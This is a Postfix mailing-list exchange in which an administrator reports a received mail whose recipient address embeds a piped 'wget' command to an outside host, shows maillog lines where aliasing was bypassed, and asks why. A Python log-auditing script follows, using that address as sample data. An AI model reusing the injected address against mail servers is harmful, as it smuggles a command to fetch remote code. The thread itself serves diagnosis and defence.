On 22.04.2010 12:50, Wietse Venema wrote:
> Arno Schäfer:
>> Hi,
>>
>> I just received the following mail in my root account's local inbox:
>>
>> >From b...@dick.com Fri Apr 9 17:54:55 2010
>> Return-Path: <b...@dick.com>
>> X-Original-To: "root+:|wget http://fortunes.in/x1x.php"
>> Delivered-To: "root+:|wget http://fortunes.in/x1x.php"@somedomain.de
>> Received: from bluedick (unknown [208.88.6.50])
>>         by mail.somedomain.de (Postfix) with SMTP id 800FC35405B
>>         for <"root+:|wget http://fortunes.in/x1x.php">; Fri, 9 Apr 2010 17:54:55 +0200 (CEST)
>> Message-Id: <20100409155455.800fc354...@mail.somedomain.de>
>> Date: Fri, 9 Apr 2010 17:54:55 +0200 (CEST)
>> From: b...@dick.com
>> To: undisclosed-recipients:;
>> Status: RO
>>
>>
>> This appears to be some kind of attack (possibly not specifically aimed
>> at postfix), that tries to exploit some mailer problem and trick the
>> system into executing a command (wget). I cannot tell for sure if it
>> succeeded, at least I did not find an "x1x*" file anywhere on my system.
>>
>> However, at least it succeeded in one thing, that is tricking out the
>> "aliases" mechanism. Normally, mail to root on my system is forwarded to
>> an external address as per:
>>
>> root: u...@somedomain.cx
>>
>> in /etc/aliases
>>
>> In this case, however, the mail landed in my local inbox, so it appears
>> in this case postfix did not do what it was supposed to do.
>
> You have configured Postfix or procmail to deliver root+stuff
> different than root. You can easily verify this by hand, while
> keeping an eye on the maillog file. This will also confirm that
> the behavior has nothing to do with having a "|" in an address
> extension.
Hm. I am not quite sure why the mail is delivered locally. In the manpage, it says:

       ADDRESS EXTENSION
              The optional recipient_delimiter configuration parameter
              specifies how to separate address extensions from local
              recipient names. For example, with "recipient_delimiter = +",
              mail for name+foo is delivered to the alias name+foo or to
              the alias name, to the destinations listed in
              ~name/.forward+foo or in ~name/.forward, to the mailbox
              owned by the user name, or it is sent back as undeliverable.

I read this such that since I have no .forward and no other alias, the mail
should be delivered to "name", in this case "root", which is aliased to the
external address. In the "normal" case, it does that:

Apr 22 13:16:17 www postfix/smtpd[26648]: connect from mail.gmx.net[213.165.64.20]
Apr 22 13:16:17 www postfix/smtpd[26648]: 33D9835405B: client=mail.gmx.net[213.165.64.20]
Apr 22 13:16:17 www postfix/cleanup[20905]: 33D9835405B: message-id=<4bd0300d.5070...@gmx.de>
Apr 22 13:16:17 www postfix/qmgr[27918]: 33D9835405B: from=<myem...@gmx.de>, size=1210, nrcpt=1 (queue active)
Apr 22 13:16:17 www postfix/smtpd[26648]: disconnect from mail.gmx.net[213.165.64.20]
Apr 22 13:16:17 www postfix/cleanup[20905]: 408CF35405E: message-id=<4bd0300d.5070...@gmx.de>
Apr 22 13:16:17 www postfix/qmgr[27918]: 408CF35405E: from=<myem...@gmx.de>, size=1352, nrcpt=1 (queue active)
Apr 22 13:16:17 www postfix/local[20906]: 33D9835405B: to=<root+...@somedomain.de>, relay=local, delay=0.1, delays=0.07/0.02/0/0.02, dsn=2.0.0, status=sent (forwarded as 408CF35405E)
Apr 22 13:16:17 www postfix/qmgr[27918]: 33D9835405B: removed
Apr 22 13:16:17 www postfix/smtp[20907]: 408CF35405E: to=<u...@somedomain.cx>, orig_to=<root+...@somedomain.de>, relay=somedomain.cx[84.59.34.193]:25, delay=0.49, delays=0.01/0.01/0.21/0.26, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 781AB4C62D)
Apr 22 13:16:17 www postfix/qmgr[27918]: 408CF35405E: removed

But if there is an illegal extension, like here:

RCPT TO:<"root+:|wget http://fortunes.in/x1x.php"@somedomain.de>

it delivers locally (this is the original mail log):

Apr 9 17:54:55 www postfix/smtpd[15767]: connect from unknown[208.88.6.50]
Apr 9 17:54:55 www postfix/smtpd[15767]: 800FC35405B: client=unknown[208.88.6.50]
Apr 9 17:54:55 www postfix/cleanup[6818]: 800FC35405B: message-id=<20100409155455.800fc354...@mail.somedomain.de>
Apr 9 17:54:55 www postfix/qmgr[2293]: 800FC35405B: from=<b...@dick.com>, size=359, nrcpt=1 (queue active)
Apr 9 17:54:55 www postfix/smtpd[15767]: disconnect from unknown[208.88.6.50]
Apr 9 17:54:55 www postfix/local[6819]: warning: 800FC35405B: address with illegal extension: root+:|wget http://fortunes.in/x1x.php
Apr 9 17:54:55 www postfix/local[6819]: 800FC35405B: to=<root+:|wget http://fortunes.in/x1x....@somedomain.de>, orig_to=<root+:|wget http://fortunes.in/x1x.php>, relay=local, delay=0.22, delays=0.16/0.02/0/0.04, dsn=2.0.0, status=sent (delivered to mailbox)
Apr 9 17:54:55 www postfix/qmgr[2293]: 800FC35405B: removed

Why is aliasing bypassed(?) in this case?

Regards,
Arno

>
> 	Wietse
>
>> Can anyone tell if this is something that should be addressed as a
>> security issue? Can this kind of attack potentially do any harm other
>> than deliver mail to the local inbox?
>>
>> Here are some system parameters:
>>
>> I am running debian 5.0.4, postfix 2.5.5-1.1.
>>
>> Here is my postconf -n:
>>
>> alias_database = hash:/etc/aliases
>> alias_maps = hash:/etc/aliases
>> append_dot_mydomain = no
>> biff = no
>> config_directory = /etc/postfix
>> inet_interfaces = all
>> mailbox_size_limit = 0
>> mydestination =
>>     somedomain.de,someotherdomain.de,localhost.localdomain,localhost
>> myhostname = mail.somedomain.de
>> mynetworks = 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128
>> myorigin = /etc/mailname
>> readme_directory = no
>> recipient_delimiter = +
>> relayhost =
>> smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache
>> smtpd_banner = $myhostname ESMTP
>> smtpd_tls_cert_file = /etc/ssl/certs/ssl-cert-snakeoil.pem
>> smtpd_tls_key_file = /etc/ssl/private/ssl-cert-snakeoil.key
>> smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache
>> smtpd_use_tls = yes

-- 
Arno Schäfer
IT Consulting & Software Development
PHP - Java - Web Applications
Linux/Unix - MySQL - High Availability - Security
Weilbornstraße 10 - 63303 Dreieich
mailto: arno_schae...@gmx.de
Tel. +49-6103-699967 | Mobile +49-171-7939236
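The question in this thread is answerable from the maillog alone: the local(8) lines carry the queue id, the original recipient, and the final disposition, so an administrator can correlate the "address with illegal extension" warning with the "delivered to mailbox" status for the same queue id and spot mail for an aliased user that ended up in a mailbox instead of being forwarded. The following script is an added example, not code from the thread or from the Postfix project. It assumes the local(8) log format shown above (Postfix 2.5-era syslog lines), takes the set of users that have /etc/aliases entries as an input supplied by the administrator (here {"root"}, matching the thread), and uses the log lines quoted in the thread as its sample input.

```python
import re

# Sample input: the three local(8) lines quoted in the thread, copied as they
# appear there (queue id 800FC35405B is the illegal-extension case, queue id
# 33D9835405B the normal forwarded case).
SAMPLE_LOG = """\
Apr 9 17:54:55 www postfix/local[6819]: warning: 800FC35405B: address with illegal extension: root+:|wget http://fortunes.in/x1x.php
Apr 9 17:54:55 www postfix/local[6819]: 800FC35405B: to=<root+:|wget http://fortunes.in/x1x....@somedomain.de>, orig_to=<root+:|wget http://fortunes.in/x1x.php>, relay=local, delay=0.22, delays=0.16/0.02/0/0.04, dsn=2.0.0, status=sent (delivered to mailbox)
Apr 22 13:16:17 www postfix/local[20906]: 33D9835405B: to=<root+...@somedomain.de>, relay=local, delay=0.1, delays=0.07/0.02/0/0.02, dsn=2.0.0, status=sent (forwarded as 408CF35405E)
"""

# local(8) warning emitted when the address extension is rejected.
WARN_RE = re.compile(
    r"postfix/local\[\d+\]: warning: (?P<qid>[0-9A-F]+): "
    r"address with illegal extension: (?P<addr>.*)$"
)

# local(8) delivery record: queue id, recipient, optional original recipient,
# final status and the parenthesised detail ("delivered to mailbox",
# "forwarded as ...").
LOCAL_RE = re.compile(
    r"postfix/local\[\d+\]: (?P<qid>[0-9A-F]+): to=<(?P<to>[^>]*)>,"
    r"(?: orig_to=<(?P<orig>[^>]*)>,)? relay=local, .*?"
    r"status=(?P<status>\w+) \((?P<detail>[^)]*)\)"
)


def unextended_user(recipient, delimiter="+"):
    """Strip the domain and the address extension, leaving the local user name."""
    localpart = recipient.rsplit("@", 1)[0]
    return localpart.split(delimiter, 1)[0]


def audit_local_deliveries(log_text, aliased_users, delimiter="+"):
    """For every local(8) delivery addressed to a user that has an alias entry,
    report whether Postfix warned about an illegal extension and whether the
    message went to a mailbox rather than through the alias."""
    illegal = {}      # queue id -> offending address
    deliveries = []   # parsed local(8) delivery records, in log order
    for line in log_text.splitlines():
        m = WARN_RE.search(line)
        if m:
            illegal[m.group("qid")] = m.group("addr")
            continue
        m = LOCAL_RE.search(line)
        if m:
            deliveries.append(m.groupdict())

    findings = []
    for d in deliveries:
        # Prefer orig_to: it is the recipient as received, before any rewriting.
        recipient = d["orig"] or d["to"]
        user = unextended_user(recipient, delimiter)
        if user not in aliased_users:
            continue
        findings.append({
            "qid": d["qid"],
            "user": user,
            "recipient": recipient,
            "illegal_extension": d["qid"] in illegal,
            "mailbox_delivery": d["status"] == "sent"
                                and d["detail"].startswith("delivered to mailbox"),
            "detail": d["detail"],
        })
    return findings


def alias_bypass_queue_ids(log_text, aliased_users, delimiter="+"):
    """Queue ids of messages for an aliased user that landed in a local mailbox."""
    return [f["qid"] for f in audit_local_deliveries(log_text, aliased_users, delimiter)
            if f["mailbox_delivery"]]


if __name__ == "__main__":
    for f in audit_local_deliveries(SAMPLE_LOG, {"root"}):
        flag = "ALIAS BYPASSED" if f["mailbox_delivery"] else "ok"
        print(f"{f['qid']} user={f['user']} illegal_ext={f['illegal_extension']} "
              f"-> {f['detail']} [{flag}]")
```

Run against a real maillog, the report isolates exactly the case the thread describes: for 800FC35405B the warning and the mailbox delivery share a queue id, while 33D9835405B shows the expected "forwarded as" path. Anything in the bypass list deserves the manual test Wietse suggests (send to root+test by hand and watch the log) and a check that no other delivery rule, such as procmail, handles root differently from root+extension.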